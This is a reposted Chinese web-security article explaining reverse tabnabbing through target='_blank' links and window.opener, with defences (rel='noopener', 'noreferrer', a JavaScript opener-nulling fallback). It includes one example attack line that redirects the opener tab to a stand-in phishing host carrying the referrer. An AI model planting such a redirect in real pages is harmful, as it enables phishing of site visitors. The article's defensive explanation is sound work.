在网页中使用链接时,如果想让浏览器在新标签页自动打开指定地址,通常的做法是在标签上添加等于“_blank”属性的添加目标。然而,正是这个属性给钓鱼攻击者带来了可乘之机。originparent和opener说opener之前,可以先说说中的parent。我们知道<iframe>提供了一个父子页面交互的对象叫window.parent,我们可以通过window.parent对象从frame中的页面访问到父页面的窗口。除了在新标签页中打开的<atarget="_blank">页面外,opener与父级相同。对于<atarget="_blank">打开的页面,可以直接使用window.opener访问源页面的window对象。同域和跨域浏览器提供完善的跨域保护。当域名相同时,parent对象和opener对象实际上直接就是上层的window对象;当域名不同时,parent和opener对象被打包为一个全局对象。这个全局对象只提供非常有限的属性访问,少数几个属性中的大部分是不允许访问的(访问会直接抛出DOMException)。在<iframe>中,提供了一个sandbox属性来控制frame中页面的权限,所以即使是同一个域,也可以控制<iframe>的安全性。如果你的网站上有一个链接并且使用了target="_blank",一旦用户点击链接进入新标签页,如果新标签页中的页面有恶意代码,你的网站可以被直接导航到一个假网站。此时,如果用户返回到您的选项卡,他们将看到替换后的页面。详细步骤在你的网站https://example.com上有一个链接:<ahref="https://an.evil.site"target="_blank">Gotoan"evil"website</a>的用户单击链接,在新选项卡中打开网站。本网站可以通过HTTPHeader中的Referer属性判断用户的来源。此外,该网站包含类似于以下的JavaScript代码:consturl=encodeURIComponent('{{header.referer}}');window.opener.location.replace('https://a.fake.site/?'+url);此时用户继续浏览新的标签页,而原网站所在的标签页已经导航到了https://a.fake.site/?https%3A%2F%2Fexample.com%2F.恶意网站https://a.fake.site根据QueryString伪造一个足以欺骗用户的页面并展示(期间还可以进行跳转,使浏览器地址栏更加混乱).用户关闭https://an.evil.site标签页,返回原站点…………回不去了。以上攻击步骤都是在跨域的情况下。在跨域的情况下,opener对象和parent一样受到限制,只提供非常有限的属性访问。为数不多的属性中,大部分是Part也是不允许访问的(访问会直接抛出DOMException)。但是和parent不同的是,opener在跨域的情况下仍然可以调用location.replace方法,而parent不可以。如果是在同域的情况下(比如某个网站的某个页面被植入了恶意代码),情况要比上面的严重得多。防御<iframe>和链接中的sandbox属性,可以使用以下方法:1、在上述ReferrerPolicy和noreferrer的攻击步骤中,利用了HTTPHeader中的Referer属性。其实可以加在HTTP响应头中。ReferrerPolicyheader确保来源隐私安全。ReferrerPolicy需要通过修改后端代码来实现,在前端也可以通过<a>标签的rel属性指定rel="noreferrer"来保证来源的隐私和安全。<ahref="https://an.evil.site"target="_blank"rel="noreferrer">转到“邪恶”网站</a>但要小心:即使您限制了referer的传输,仍然无法阻止原始标签被恶意重定向。2.noopener为安全起见,现代浏览器支持在<a>标签的rel属性中指定rel="noopener"。这样opener对象在打开的新标签页中就不能再使用了,设置为null。<ahref="https://an.evil.site"target="_blank"rel="noopener">进入一个“邪恶”网站</a>3.JavaScriptnoopener属性似乎可以解决所有问题,但是。..浏览器兼容性问题...可以看出现在大部分浏览器都兼容rel="noopener"属性。但是,要保护较旧的“现代”浏览器或非常古老的“古代”浏览器甚至“古代”浏览器,noopener属性是不够的。这时,我们只能求助于下面的原生JavaScript。“使用严格”;函数openUrl(url){varnewTab=window.open();newTab.opener=null;newTab.location=url;}推荐首先,网站中的链接,如果使用target="_blank",需要带rel="noopener",建议带rel="noreferrer"。类似这样:<ahref="https://an.evil.site"target="_blank"rel="noopenernoreferrer">进入一个“邪恶”网站</a>当然是跳转到第三方后对于网站来说,SEO权重也建议带上rel="nofollow",所以最后是这样的:<ahref="https://an.evil.site"target="_blank"rel="noopenernoreferrernofollow">进入一个“邪恶”的网站</a>性能最后,让我们谈谈性能。如果网站使用<atarget="_blank">,新打开的标签页的性能会影响当前页面。这时候如果在新打开的页面中执行一个非常大的JavaScript脚本,原来的标签页也会受到影响,就会出现卡顿的现象(当然不会卡)。而如果在链接中加入noopener,此时两个tab页面就不会互相干扰,这样原页面的性能就不会因为新页面而受到影响。文/jinliming2一条对新鲜事物充满好奇的咸鱼/颖生本文已获得作者授权,版权归创宇前端所有。转载本文欢迎注明出处。本文链接:https://knownsec-fed.com/2018...想订阅知道创宇更多分享,请搜索并关注我们微信公众号:知道创宇(KnownsecFED)。欢迎留言讨论,我们会尽量回复。欢迎点赞、收藏、评论、转发、分享和打赏支持我们。提示将全部转给文章作者。谢谢阅读。</p> </div> </div> <div class="zuowen_sxy"> <div class="prev">上一篇:<a title="百度云加速:DDOS反弹技术震撼发布" href="/webqianduan/229938.html">百度云加速:DDOS反弹技术震撼发布</a> </div> <div class="prev">下一篇:<a title="CSS外部样式_0" href="/webqianduan/229940.html">CSS外部样式_0</a> </div> </div> <div class="related_about"> <div class="related_about_t"><code>你没有注意到的隐患:dangeroustarget=-_blank-and-opener-相关文章</code></div> <ul> <li><a href="/kejifunen/370867.html" target="_blank" title="谁和你一起跑步?最受网友欢迎的8款运动耳机">谁和你一起跑步?最受网友欢迎的8款运动耳机</a></li> <li><a href="/kejifunen/370845.html" target="_blank" title="面对质疑,Facebook依然没有推出Apple Watch">面对质疑,Facebook依然没有推出Apple Watch</a></li> <li><a href="/kejifunen/370841.html" target="_blank" title="谈论触觉反馈技术,让你在虚拟现实世界中漫游">谈论触觉反馈技术,让你在虚拟现实世界中漫游</a></li> <li><a href="/kejifunen/370820.html" target="_blank" title="这款智能首饰值得关注!时尚美丽也能保护你">这款智能首饰值得关注!时尚美丽也能保护你</a></li> <li><a href="/kejifunen/370807.html" target="_blank" title="通过振动引导你的智能腰带">通过振动引导你的智能腰带</a></li> <li><a href="/kejifunen/370797.html" target="_blank" title="想购买完全无线的耳机吗?或许你可以等待索尼的两款新品">想购买完全无线的耳机吗?或许你可以等待索尼的两款新品</a></li> <li><a href="/kejifunen/370769.html" target="_blank" title="可穿戴设备想要改变大脑,你能接受吗? ">可穿戴设备想要改变大脑,你能接受吗? </a></li> <li><a href="/kejifunen/370767.html" target="_blank" title="虚拟现实的三大阵营你最喜欢哪一个? ">虚拟现实的三大阵营你最喜欢哪一个? </a></li> <li><a href="/kejifunen/370759.html" target="_blank" title="使用可穿戴设备支付!你能杀掉二维码吗? ">使用可穿戴设备支付!你能杀掉二维码吗? </a></li> <li><a href="/kejifunen/370748.html" target="_blank" title="小米上市首日开盘即破发,以后你还会购买吗? ">小米上市首日开盘即破发,以后你还会购买吗? </a></li> <li><a href="/kejifunen/370739.html" target="_blank" title="CES 直接 -智能产品合集 你有最喜欢的智能家居吗? ">CES 直接 -智能产品合集 你有最喜欢的智能家居吗? </a></li> <li><a href="/kejifunen/370706.html" target="_blank" title="三星Gear Fit2智能手环升级,让你运动无束缚">三星Gear Fit2智能手环升级,让你运动无束缚</a></li> <li><a href="/kejifunen/370702.html" target="_blank" title="Thync 头带评测!帮助你摆脱焦虑、恢复活力的可穿戴设备">Thync 头带评测!帮助你摆脱焦虑、恢复活力的可穿戴设备</a></li> <li><a href="/kejifunen/370692.html" target="_blank" title="这款智能手环有一百种显示方式通知你">这款智能手环有一百种显示方式通知你</a></li> <li><a href="/kejifunen/370681.html" target="_blank" title="乐视电视没有死!新品价格突然飙升">乐视电视没有死!新品价格突然飙升</a></li> <li><a href="/kejifunen/370666.html" target="_blank" title="热烈讨论!你能用什么来拯救你?可穿戴设备">热烈讨论!你能用什么来拯救你?可穿戴设备</a></li> <li><a href="/kejifunen/370660.html" target="_blank" title="网购“三件神器”只是靠运气吗? D.Phone UP+给你更">网购“三件神器”只是靠运气吗? D.Phone UP+给你更</a></li> <li><a href="/kejifunen/370653.html" target="_blank" title="记录美丽风景! vivo X23与雷克萨斯带你踏上探索之旅!">记录美丽风景! vivo X23与雷克萨斯带你踏上探索之旅!</a></li> <li><a href="/kejifunen/370647.html" target="_blank" title="用AI连接你的生活! TOPPERS将在GMIC大会上展示多">用AI连接你的生活! TOPPERS将在GMIC大会上展示多</a></li> <li><a href="/kejifunen/370642.html" target="_blank" title="服务机器人什么时候走进你家? ">服务机器人什么时候走进你家? </a></li> </ul> </div> </div> <div class="main-right"> <div class="right_fix"> <div class="r_con"> <div class="r_title">最新推荐</div> <ul> <li><em>1</em><a href="/kejifunen/371284.html" title="这款智能耳机不需要连接手机,它知道你喜欢听什么" target="_blank">这款智能耳机不需要连接手机,它知道你喜欢听什么</a></li> <li><em>2</em><a href="/kejifunen/371270.html" title="大数据告诉你VR成人电影有多受欢迎? " target="_blank">大数据告诉你VR成人电影有多受欢迎? </a></li> <li><em>3</em><a href="/kejifunen/371266.html" title="小米手环3体验!也许它可以取代你的智能手表" target="_blank">小米手环3体验!也许它可以取代你的智能手表</a></li> <li><em>4</em><a href="/kejifunen/371242.html" title="可穿戴设备!你有自己的信息" target="_blank">可穿戴设备!你有自己的信息</a></li> <li><em>5</em><a href="/kejifunen/371236.html" title="【教程】拒绝平庸,教你玩转荣耀手环零" target="_blank">【教程】拒绝平庸,教你玩转荣耀手环零</a></li> <li><em>6</em><a href="/kejifunen/371218.html" title="手机照片盲评:哪张照片最适合你的选择? " target="_blank">手机照片盲评:哪张照片最适合你的选择? </a></li> <li><em>7</em><a href="/kejifunen/371215.html" title="全面评测399元华为荣耀手环零!你不知道的偏执" target="_blank">全面评测399元华为荣耀手环零!你不知道的偏执</a></li> <li><em>8</em><a href="/kejifunen/371212.html" title="麦博智能区块链手环!健康链接区块,区块链接财富,财富链接你我" target="_blank">麦博智能区块链手环!健康链接区块,区块链接财富,财富链接你我</a></li> <li><em>9</em><a href="/kejifunen/371202.html" title="当VR遇见成人视频世界,你愿意为此买单吗? " target="_blank">当VR遇见成人视频世界,你愿意为此买单吗? </a></li> <li><em>10</em><a href="/kejifunen/371192.html" title="什么能让你摆脱“随机无蛋”的可穿戴产品? " target="_blank">什么能让你摆脱“随机无蛋”的可穿戴产品? </a></li> </ul> </div> <div class="r_con"> <div class="r_title">猜你喜欢</div> <ul class="you_like"> <li><em>1</em><a href="/kejifunen/371175.html" title="自动驾驶!我希望你能带我去未来而不是死亡" target="_blank">自动驾驶!我希望你能带我去未来而不是死亡</a></li> <li><em>2</em><a href="/kejifunen/371168.html" title="比尔盖茨!没想到你可以用智能手表来管理你的牛群" target="_blank">比尔盖茨!没想到你可以用智能手表来管理你的牛群</a></li> <li><em>3</em><a href="/kejifunen/371162.html" title="这款智能手环自带闹钟功能,不叫醒你,就会电击你" target="_blank">这款智能手环自带闹钟功能,不叫醒你,就会电击你</a></li> <li><em>4</em><a href="/kejifunen/371155.html" title="红领队是索尼OLED电视A1的粉丝,你呢? " target="_blank">红领队是索尼OLED电视A1的粉丝,你呢? </a></li> <li><em>5</em><a href="/kejifunen/371118.html" title="三星曝20个新漏洞!黑客可以控制你家的摄像头和门锁" target="_blank">三星曝20个新漏洞!黑客可以控制你家的摄像头和门锁</a></li> <li><em>6</em><a href="/kejifunen/371111.html" title="明星都在玩VR,你为什么不跟上呢? " target="_blank">明星都在玩VR,你为什么不跟上呢? </a></li> <li><em>7</em><a href="/kejifunen/371106.html" title="VR体验中心火爆,从密室逃脱到VR的“转变”你了解多少" target="_blank">VR体验中心火爆,从密室逃脱到VR的“转变”你了解多少</a></li> <li><em>8</em><a href="/kejifunen/371099.html" title="空调节能小窍门!我就不信你知道! " target="_blank">空调节能小窍门!我就不信你知道! </a></li> <li><em>9</em><a href="/kejifunen/371071.html" title="改变你的生活!这些扫地机器人值得你关注! " target="_blank">改变你的生活!这些扫地机器人值得你关注! </a></li> <li><em>10</em><a href="/kejifunen/371057.html" title="Apple Watch 销量直线下降,这些背后的原因你有深究" target="_blank">Apple Watch 销量直线下降,这些背后的原因你有深究</a></li> <li><em>11</em><a href="/kejifunen/370998.html" title="那么多人翘班买Find X,你老板知道吗? " target="_blank">那么多人翘班买Find X,你老板知道吗? </a></li> <li><em>12</em><a href="/kejifunen/370986.html" title="智能手表 还在关注 Apple Watch 吗?华米智能手表" target="_blank">智能手表 还在关注 Apple Watch 吗?华米智能手表</a></li> <li><em>13</em><a href="/kejifunen/370951.html" title="运动能量集合!把你变成驱动可穿戴设备和物联网的动力源" target="_blank">运动能量集合!把你变成驱动可穿戴设备和物联网的动力源</a></li> <li><em>14</em><a href="/kejifunen/370945.html" title="穹顶之下,那些帮助你健康顺利跑步" target="_blank">穹顶之下,那些帮助你健康顺利跑步</a></li> <li><em>15</em><a href="/kejifunen/370935.html" title="虚拟现实的局限性!没有办法摆脱头戴式显示形式" target="_blank">虚拟现实的局限性!没有办法摆脱头戴式显示形式</a></li> <li><em>16</em><a href="/kejifunen/370923.html" title="有了iOS 12智能家居,你还需要HomePod吗? " target="_blank">有了iOS 12智能家居,你还需要HomePod吗? </a></li> <li><em>17</em><a href="/kejifunen/370922.html" title="又一场AR旋风,你想了解AR头盔吗? " target="_blank">又一场AR旋风,你想了解AR头盔吗? </a></li> <li><em>18</em><a href="/kejifunen/370920.html" title="远程控制移动设备?这个智能传感器你一定要好好看看" target="_blank">远程控制移动设备?这个智能传感器你一定要好好看看</a></li> <li><em>19</em><a href="/kejifunen/370914.html" title="我已经用眼睛确认你就是我要找的人" target="_blank">我已经用眼睛确认你就是我要找的人</a></li> <li><em>20</em><a href="/kejifunen/370910.html" title="酷狗耳机VS望仙兔,中秋“定情信物”你更喜欢哪一款? " target="_blank">酷狗耳机VS望仙兔,中秋“定情信物”你更喜欢哪一款? </a></li> </ul> </div> </div> </div> </div> <div class="related_article"></div> <div class="footer"> <p>Copyright © 2012-2022 程序源 版权所有<a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">豫ICP备2022028201号</a></p> <p>重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。 如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。</p> </div> <!-- 应用插件标签 start --> <!-- 应用插件标签 end --> </body> </html>
